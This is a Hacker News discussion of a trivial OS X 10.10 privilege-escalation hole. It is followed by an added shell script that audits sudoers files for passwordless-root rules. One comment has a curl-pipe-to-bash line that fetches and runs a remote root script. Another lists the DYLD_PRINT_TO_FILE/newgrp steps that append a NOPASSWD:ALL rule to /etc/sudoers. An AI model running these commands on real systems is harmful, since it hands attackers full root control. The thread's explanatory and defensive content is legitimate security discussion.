

Get root on an OS X 10.10 Mac: The exploit is so trivial it fits in a tweet - nchelluri
http://www.theregister.co.uk/2015/07/22/os_x_root_hole/

======
nchelluri
There was an earlier discussion here:
[https://news.ycombinator.com/item?id=9934428](https://news.ycombinator.com/item?id=9934428)

I think it was flagged because it used some social media tracking URL instead
of the original...

Here's my post from that thread:

I like to think of this as a good example of why not to use curl to execute
bash scripts.

    
    
      curl -s https://raw.githubusercontent.com/nchelluri/rootyourself/master/doh.sh | bash

------
gcb0
Does anyone have any explanation?

apparently it

1. sets `DYLD_PRINT_TO_FILE=/etc/sudoers` on the env,
2. runs `newgrp`,
3. and passes in `'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3'` as input to it.


everything seems innocuous and properly escaped as to not trigger anything
bad...
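
A defender-side check for the end state the steps above describe, a `NOPASSWD:ALL` rule appended to `/etc/sudoers`, as an added example that is not part of the thread or of the linked script. The function names, the allowlist argument and the sample file contents are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: flag blanket passwordless sudo rules in a sudoers-format file.

# audit_sudoers FILE [ALLOWED_PRINCIPAL...]
# Prints "lineno:principal:rule" for each active rule that ends in
# NOPASSWD: ALL and whose principal is not in the allowlist.
# Exit status: 0 = nothing flagged, 1 = at least one hit, 2 = file unreadable.
audit_sudoers() {
    file=$1; shift
    [ -r "$file" ] || return 2
    awk -v allowed="$*" '
        BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        # Skip comments and blank lines (this also skips #include
        # directives, which this check does not follow).
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        /^[ \t]*Defaults/ { next }
        /NOPASSWD:[ \t]*ALL[ \t]*$/ {
            principal = $1
            if (!(principal in ok)) {
                printf "%d:%s:%s\n", NR, principal, $0
                hits++
            }
        }
        END { exit (hits > 0) }
    ' "$file"
}

# Constructed sample: ordinary rules plus one line of the form quoted in the
# comment above ("alice" is a placeholder user name).
sample_sudoers() {
    cat <<'EOF'
# sudoers file (constructed sample)
Defaults env_reset
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
%wheel  ALL=(ALL) NOPASSWD: ALL
alice ALL=(ALL) NOPASSWD:ALL
EOF
}

# Demo: %wheel is treated as an expected passwordless group, so only the
# per-user rule on line 6 is reported.
tmp=$(mktemp) && sample_sudoers > "$tmp"
audit_sudoers "$tmp" %wheel || echo "audit status: $?"
rm -f "$tmp"
```

Against a real system the file argument would be `/etc/sudoers`, which normally needs root to read.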

